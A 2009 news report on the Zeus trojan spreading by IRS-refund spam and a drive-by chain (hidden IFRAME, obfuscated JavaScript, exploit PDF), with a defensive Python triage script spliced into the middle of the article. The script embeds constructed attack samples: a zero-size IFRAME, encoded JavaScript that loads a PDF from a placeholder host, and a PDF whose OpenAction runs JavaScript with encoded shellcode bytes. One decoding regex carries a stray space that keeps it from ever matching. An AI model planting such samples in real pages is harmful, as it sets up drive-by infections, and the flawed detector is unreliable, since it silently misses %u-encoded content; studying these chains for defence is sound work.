
Zeus spreading through drive-by download

Updated Tuesday, Dec. 1, 2009 at 10:47 a.m. EST

The notorious information-stealing Zeus trojan is currently spreading via drive-by download, said security researchers at IT management software and solutions vendor CA.

Those behind Zeus, or Zbot, recently began circulating spam claiming to come from the Internal Revenue Service (IRS), requesting that users submit a “tax refund request form” by clicking on a link provided in the message.

Clicking takes victims to a website that attempts to perform a drive-by download, meaning users do not need to take any further action to be infected, Don Debolt, director of threat research at CA, told SCMagazineUS.com on Monday.

If clicked, the link loads a browser window that appears blank but, in the background, attempts to download malicious code and install a variant of Zeus, Mary Grace Gabriel, research engineer at CA's Internet Security Business Unit, wrote in a recent blog post.

The malicious website contains an IFRAME pointing to a second website that hosts obfuscated JavaScript code, which in turn loads yet another page where a PDF file attempts to exploit known, already-patched vulnerabilities in Adobe Reader to download and execute a Zeus variant. Because the exploited flaws have been patched, this final stage depends on the victim running an out-of-date copy of Reader.
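The three-stage chain described above (hidden IFRAME on the landing page, percent-encoded JavaScript on a second page, a PDF carrying JavaScript in its OpenAction) lends itself to a simple static triage script. The following is an added example, not code from the article or from CA's research: the HTML and PDF artifacts, the hostnames `intermediate.example` and `exploit.example`, and the indicator names are all constructed for illustration. The script does not emulate JavaScript; it only resolves the `unescape()` pattern the constructed sample uses and greps the PDF for the dictionary keys that typically carry an exploit.

```python
"""Static triage of a drive-by chain: hidden IFRAME -> obfuscated JS -> booby-trapped PDF.
All artifacts below are constructed samples; hostnames are placeholders, not real indicators."""
import re
from urllib.parse import unquote

# --- constructed sample artifacts (not real captures) -----------------------------------
LANDING_HTML = (
    '<html><body><p></p>'
    '<iframe src="http://intermediate.example/loader.html" '
    'width="0" height="0" style="visibility:hidden"></iframe>'
    '</body></html>'
)
INTERMEDIATE_HTML = (
    '<html><head><script>'
    'var s="%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example%2Frefund.pdf%22'
    '%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E";'
    'document.write(unescape(s));'
    '</script></head></html>'
)
PDF_BYTES = (
    b'%PDF-1.4\n'
    b'1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n'
    b'3 0 obj << /S /JavaScript /JS (var sc = unescape("%u9090%u9090%uCCCC");) >> endobj\n'
    b'%%EOF\n'
)

IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)')
STRING_VAR_RE = re.compile(r'var\s+(\w+)\s*=\s*(["\'])(.*?)\2', re.DOTALL)
UNESCAPE_RE = re.compile(r'unescape\(\s*(?:(\w+)|(["\'])(.*?)\2)\s*\)')
# PDF dictionary keys that commonly carry the exploit or trigger it on open.
PDF_RISKY_NAMES = (b'/OpenAction', b'/AA', b'/JavaScript', b'/JS', b'/Launch', b'/EmbeddedFile')


def find_iframes(html):
    """Return [(src, hidden)] for every IFRAME; hidden = zero-sized or invisible."""
    found = []
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        style = attrs.get('style', '').replace(' ', '').lower()
        hidden = (attrs.get('width') == '0' or attrs.get('height') == '0'
                  or 'visibility:hidden' in style or 'display:none' in style)
        found.append((attrs.get('src', ''), hidden))
    return found


def js_indicators(script):
    """Cheap signals that a script is obfuscated rather than ordinary page logic."""
    found = set()
    for name in ('eval', 'unescape', 'fromCharCode'):
        if re.search(r'\b%s\s*\(' % name, script):
            found.add(name)
    if len(re.findall(r'%[0-9A-Fa-f]{2}', script)) >= 10:  # threshold is an assumption
        found.add('percent_encoded_blob')
    return found


def decode_unescape_calls(script):
    """Resolve unescape(<literal or var>) calls to the text they would emit."""
    variables = {name: val for name, _, val in STRING_VAR_RE.findall(script)}
    decoded = []
    for name, _, literal in UNESCAPE_RE.findall(script):
        raw = variables.get(name, '') if name else literal
        raw = re.sub(r'%u([0-9A-Fa-f]{4}) ', lambda m: chr(int(m.group(1), 16)), raw)
        decoded.append(unquote(raw))
    return decoded


def pdf_indicators(pdf):
    """Grep the raw PDF for risky names and %uXXXX-encoded shellcode. Note: real samples
    often hide these behind /ObjStm compression or #xx name escapes, which this misses."""
    found = {n.decode() for n in PDF_RISKY_NAMES
             if re.search(re.escape(n) + rb'(?![A-Za-z])', pdf)}
    if re.search(rb'%u[0-9A-Fa-f]{4}(?:%u[0-9A-Fa-f]{4})+', pdf):
        found.add('unicode_escaped_shellcode')
    return found


def triage_chain(landing_html, intermediate_html, pdf_bytes):
    """Walk all three stages and return the evidence gathered at each one."""
    hidden_landing = [src for src, hidden in find_iframes(landing_html) if hidden]
    decoded = decode_unescape_calls(intermediate_html)
    targets = [src for page in decoded for src, _ in find_iframes(page)]
    pdf_ind = pdf_indicators(pdf_bytes)
    suspicious = (bool(hidden_landing) and bool(targets)
                  and bool(pdf_ind & {'/OpenAction', '/AA'})
                  and bool(pdf_ind & {'/JavaScript', '/JS'}))
    return {
        'landing_hidden_iframes': hidden_landing,
        'js_indicators': sorted(js_indicators(intermediate_html)),
        'decoded_iframe_targets': targets,
        'pdf_indicators': sorted(pdf_ind),
        'suspicious': suspicious,
    }


if __name__ == '__main__':
    for key, value in triage_chain(LANDING_HTML, INTERMEDIATE_HTML, PDF_BYTES).items():
        print(f'{key}: {value}')
```

The script is deliberately static: it never executes the JavaScript, so an attacker who switches from `unescape()` to `String.fromCharCode` arithmetic or a custom decoder will defeat the decoder step while still tripping the `js_indicators` signals. Treat the PDF check as a triage filter rather than a verdict, since object streams and hex-escaped names hide the keys it looks for; a real analysis would decompress the streams first.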

Previous spam campaigns used to spread Zeus have asked users to manually download and execute various reports, tools or statements seemingly coming from MySpace, Facebook, the IRS, Microsoft, the U.S. Social Security Administration and Verizon Wireless. This is the first IRS-themed drive-by campaign, but it is not the first time Zeus authors have used the drive-by download technique, Debolt said.

“The people behind this threat are constantly refreshing their tactics,” he said.

The spam messages used in this latest campaign use subject lines related to IRS refunds. The body of the email reads: “After the last annual calculations of your fiscal activity we have determined that you are eligible to receive 760.22$ tax refund under section 501(c) (18) of the Internal Revenue Code.”

The IRS recently posted a notice, warning users about phony e-mail claiming to come from the agency.

“The IRS does not send unsolicited e-mails to taxpayers about their tax accounts,” the agency said. “Anyone who receives an unsolicited e-mail claiming to come from the IRS should avoid opening any attachments or clicking on any links.”
